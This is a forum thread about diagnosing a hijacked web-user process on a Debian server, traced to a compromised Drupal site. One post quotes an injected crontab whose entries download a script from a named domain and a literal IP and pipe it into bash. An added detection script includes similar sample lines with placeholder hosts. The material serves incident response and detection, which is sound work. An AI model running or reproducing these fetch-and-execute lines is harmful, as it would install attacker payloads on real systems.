High CPU usage process issue (apache -k) - SOLVED

Discussion in 'Installation/Configuration' started by zion, Oct 10, 2019.

  1. zion

    zion Member

    Hi all,
    I have a webserver where I see a process in top which shows 300% %CPU usage.
    Code:
    # ps aux | grep web821
    web821   28051  399  0.0 427828 11648 ?        Ssl  19:01  21:46 apache -k
    
    I've disabled all websites and subdomains (vhosts) which are related to this web821 user.
    Code:
    # ls -l /home/| grep web821
    lrwxrwxrwx   1 root         root           31 Nov 22  2018 dev.***.tld -> /home/clients/client138/web821/
    lrwxrwxrwx   1 root         root           31 Sep  5  2014 ***.tld -> /home/clients/client138/web821/
    lrwxrwxrwx   1 root         root           31 Jun 19  2016 new.***.tld -> /home/clients/client138/web821/
    Code:
    # ls -l /etc/apache2/sites-enabled/| grep ***
    I killed each process where the user is web821 with the kill command, but this strange "apache -k" process appears again and again.
    I have no idea where this "apache -k" command comes from with the web821 user.
    Can you please help me find the cause of this issue?
    Code:
    Debian 8.11
    Apache/2.4.10 (Debian)
    Thank you in advance,
    Gyula
     
    Last edited: Oct 11, 2019
  2. zion

    zion Member

    I've created a little script which checks the process list every minute, kills this bad process, then writes the current time to a log file. The log file looks like this now:
    Code:
    Thu Oct 10 22:02:18 CEST 2019
    Thu Oct 10 23:02:01 CEST 2019
    Fri Oct 11 00:02:01 CEST 2019
    Fri Oct 11 01:02:01 CEST 2019
    Fri Oct 11 02:02:01 CEST 2019
    Fri Oct 11 03:03:01 CEST 2019
    Fri Oct 11 04:02:01 CEST 2019
    Fri Oct 11 05:02:01 CEST 2019
    Fri Oct 11 06:02:01 CEST 2019
    Then I've found this in /var/spool/cron/crontabs/:
    Code:
    # DO NOT EDIT THIS FILE - edit the master and reinstall.
    # (- installed on Fri Oct 11 06:01:01 2019)
    # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
    1 * * * * wget -O- repo-linux.com/a | bash -
    1 * * * * (wget -q http://157.245.235.139/s/xminstall -O - || curl -fs http://157.245.235.139/s/xminstall)|bash
    /var/spool/cron/crontabs/web821 (END)
    
    I first saw this bad process yesterday, but this file looks like it was installed today, on Fri Oct 11 06:01:01 2019.
    I haven't found the master of this file in /etc/crontab or in /etc/cron.d/ or in crontab yet... but I've found this:
    https://www.reddit.com/r/sysadmin/comments/8garvk/check_your_cronjobs_examining_a_drupal_7_hacked/
    To be continued...
     
  3. zion

    zion Member

    OK, so this Drupal website was hacked. I told the owner of the website to update the modules and check the files in his development environment before I enable it again.
    I've removed this cron job from /var/spool/cron/crontabs/ with the command 'crontab -u web821 -r' because I haven't found the master of it, and this apache -k command didn't appear in the process list again.
     
    Jesse Norell likes this.
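
Added example, not part of the original posts: a shell function that scans crontab files for the pattern found in this thread, a wget or curl download piped straight into a shell. The function names and the sample hosts (`fetch.example`, `192.0.2.10`, `backup.example`) are constructed for illustration; on Debian the paths to pass are `/var/spool/cron/crontabs`, `/etc/cron.d` and `/etc/crontab`.

```shell
#!/bin/sh
# Added example (not from the thread): flag cron entries that fetch a script
# with wget/curl and pipe it straight into a shell interpreter.

# ERE: a fetch tool, then later on the same line a pipe into sh/bash/dash/zsh/ksh.
FETCH_PIPE_RE='(wget|curl).*\|[[:space:]]*(ba|da|z|k)?sh([[:space:]]|$)'

# scan_file FILE: print "FILE: entry" for each non-comment line that matches.
scan_file() {
    grep -Ev '^[[:space:]]*#' "$1" | grep -E "$FETCH_PIPE_RE" |
        while IFS= read -r entry; do printf '%s: %s\n' "$1" "$entry"; done
}

# scan_crontabs PATH...: scan each file, or every regular file in each directory.
scan_crontabs() {
    for path in "$@"; do
        if [ -d "$path" ]; then
            for f in "$path"/*; do
                if [ -f "$f" ]; then scan_file "$f"; fi
            done
        elif [ -f "$path" ]; then
            scan_file "$path"
        fi
    done
    return 0
}

# demo: run the scan over constructed sample crontabs (hosts are placeholders).
demo() {
    d=$(mktemp -d)
    printf '%s\n' '# DO NOT EDIT THIS FILE - edit the master and reinstall.' \
        '1 * * * * wget -O- fetch.example/a | bash -' \
        '1 * * * * (wget -q http://192.0.2.10/s/i -O - || curl -fs http://192.0.2.10/s/i)|bash' \
        > "$d/webuser"
    printf '%s\n' '17 3 * * * /usr/bin/curl -fsS https://backup.example/ping' \
        '0 4 * * * /usr/local/bin/rotate.sh | logger -t rotate' > "$d/root"
    scan_crontabs "$d"    # only the two webuser entries are reported
    rm -rf "$d"
}

# With arguments: scan those paths. Without: run the demo.
if [ "$#" -gt 0 ]; then scan_crontabs "$@"; else demo; fi
```

Reading the per-user spool directory requires root, and a hit is a lead to review rather than proof of compromise, since some legitimate installers use the same download-and-pipe form.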
